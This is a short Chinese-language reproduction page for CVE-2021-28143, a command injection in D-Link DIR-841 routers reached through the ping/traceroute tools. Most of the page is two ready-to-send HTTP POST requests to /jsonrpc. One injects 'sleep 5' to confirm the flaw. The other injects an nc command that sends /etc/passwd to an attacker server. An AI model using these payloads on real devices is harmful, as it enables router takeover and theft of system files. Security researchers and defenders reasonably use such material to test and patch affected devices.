# D-Link DIR-841 命令注入漏洞 CVE-2021-28143 ## 漏洞描述 D-Link DIR-841 3.03和3.04 存在经过身份验证的命令注入,通过“系统工具”(ping/ping6/traceroute)命令注入,可导致攻击者进行完全控制设备。 参考链接: - https://nvd.nist.gov/vuln/detail/CVE-2021-28143 - https://github.com/vitorespf/Advisories/blob/master/DLINK-DIR-841-command-injection.txt ## 漏洞复现 poc: ``` POST /jsonrpc HTTP/1.1 Host: IP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: application/json, text/plain, */* Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Authorization: Digest username="admin", realm="domain", nonce="4784226", uri="/jsonrpc", response="84799b55020cf2c53e28214e3d60b899", qop=auth, nc=00000035, cnonce="bPzBB3mcvSb51Ijx" Content-Length: 156 Origin: IP Connection: close Referer: http://ip-address:9821/admin/index.html Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id= {"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"'127.0.0.1 & sleep 5'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757} ``` Exfiltrating files: ``` POST /jsonrpc HTTP/1.1 Host: IP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: application/json, text/plain, */* Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Authorization: Digest username="admin", realm="domain", nonce="4784226", uri="/jsonrpc", response="84799b55020cf2c53e28214e3d60b899", qop=auth, nc=00000035, cnonce="bPzBB3mcvSb51Ijx" Content-Length: 156 Origin: IP Connection: close Referer: http://ip-address:9821/admin/index.html Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id= {"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"'127.0.0.1 & nc SERVER-IP 1234 < /etc/passwd'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757} ```